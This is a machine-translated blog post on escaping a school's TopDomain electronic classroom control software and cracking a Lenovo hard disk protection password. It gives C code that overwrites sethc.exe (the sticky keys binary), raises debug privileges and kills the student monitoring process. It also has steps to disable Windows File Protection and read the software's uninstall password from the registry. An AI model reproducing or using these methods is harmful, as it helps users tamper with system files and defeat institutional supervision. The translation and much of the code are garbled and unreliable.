[Original] When VC is controlled, close the polar domain electronic classroom and crack the Lenovo hard disk protection system password (below)

Next we will discuss how to close the polar domain electronic classroom and crack the Lenovo hard disk protection system password (I) when the [original] VC is under control.

[Original] Methods for Improving the closure of polar domain electronic classrooms during VC operation

First, let's talk about how to view the password ". However, I tried to read data from the hard disk, and the result was not successful. I had to pin my final hope to read the data from the MBR backup file. But how can we get an MBR file? There is no other tool around. There is only one 360 system first aid kit, which can help me a lot. I used it to back up the MBR boot file, click "read from MBR backup file" of "Lenovo hard disk protection system password cracking", select the MBR boot file we just backed up, and try again! This indicates that we can crack it without clearing MBR. (Note: the default password of the Lenovo hard disk protection system should be Lenovo)

Go back to how to close the polar domain classroom when it is under control. We have already mentioned the sticky key, so we can use the sticky key to get rid of control. Processing Procedure: (complete source code: 1.360 cloud Disk 2. Sina micro disk)

//include.h
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <stdlib.h>
void OnStart()
{
 char szAppName[256]={0};
 GetModuleFileName(NULL,szAppName,128);
 if( strcmp(szAppName,"C:\\WINDOWS\\system32\\sethc.exe") )
 {
  CopyFile(szAppName,"C:\\WINDOWS\\system32\\sethc.exe",FALSE);
  //CopyFile(szAppName,"C:\\WINDOWS\\system32\\dllcache\\sethc.exe",FALSE);
 }
} 

// Main. cpp
# Include "include. H"
Int main ()
{
Onstart ();
Handle htoken; // raise the process permission
Openprocesstoken (getcurrentprocess (), token_adjust_privileges, & htoken );
Token_privileges TP;
Lookupprivilegevalue (null, se_debug_name, & TP. Privileges [0]. luid );
TP. privilegecount = 1;
TP. Privileges [0]. Attributes = se_privilege_enabled;
Adjusttokenprivileges (htoken, false, & TP, sizeof (token_privileges), null, null );
 
Processentry32 PD; // process data)
PD. dwsize = sizeof (PD); // initialization size
Handle hprocesssnap =: createconlhelp32snapshot (th32cs_snapprocess, 0); // create a process Snapshot
Bool choose =: process32first (hprocesssnap, & PD); // find the process
Bool stdexe = false; // first, assume that the student machine process does not exist.
While (choose)
{
If (! Strcmp (PD. szexefile, "studentmain.exe") // if the student machine process is found
{
Stdexe = true; // student machine process found
{
Handle STD = OpenProcess (process_all_access, false, PD. th32processid); // obtain the Process Handle
If (: terminateprocess (STD, 0) = false) // end it
{
// Process when the process fails to end
}
}
Break;
}
Choose =: process32next (hprocesssnap, & PD); // find the next process. If the function returns 0, no process can be searched.
}
If (stdexe = false)
{
// Process when no process is found
Winexec ("C :\\ Program Files \ topdomain \ e-learning class \ studentmain.exe", sw_show); // replace this with your school
// Address of the polar domain electronic classroom
}
Return 0;
}

Program running instructions:

1. Press windows (logo) + R to bring up and run. Enter gpedit. MSC. Double-click "Computer Configuration"-"management template"-"System"-"Windows File Protection", right-click "specify Windows File Protection Cache location ", click "properties" ("edit" under Windows 7) and click "disabled ". Set "set Windows File Protection scan" to "disabled" in the same way ".

2. Locate the uninstallpasswd key under HKEY_LOCAL_MACHINE \ SOFTWARE \ topdomain \ e-learning class standard \ 1.00 and copy its key value.
3. Right-click the small computer icon in the lower right corner, right-click, and click "set". The system prompts you to enter the password, enter the entered information, and click "OK". You will find that you can change the settings.

. Select the check box on the "organize students to close this process" tab.

4. Run the software. There is a program at the end of the third natural section of this article, which contains the source code. The source code is compiled in VC ++ 6.0. You can directly use DEBUG/sethc.exe without programming. The program automatically copies itself to c: \ windows \ system32 \, and the program name is sethc.exe. The polar domain classroom is automatically closed.

5. run the polar domain electronics classroom for testing (press shift 5 and place the mouse pointer on the small computer icon to see if it disappears suddenly). If the program is not closed successfully, run it several times.

In fact, there are other good ways to close the polar domain electronic classroom. For example, I am trying to send the wm_queryendsession message to the polar domain electronic classroom ......

If you have any questions, contact me. E-mail: sunnysab@yeah.net.

[Original] Methods for Improving the closure of polar domain electronic classrooms during VC operation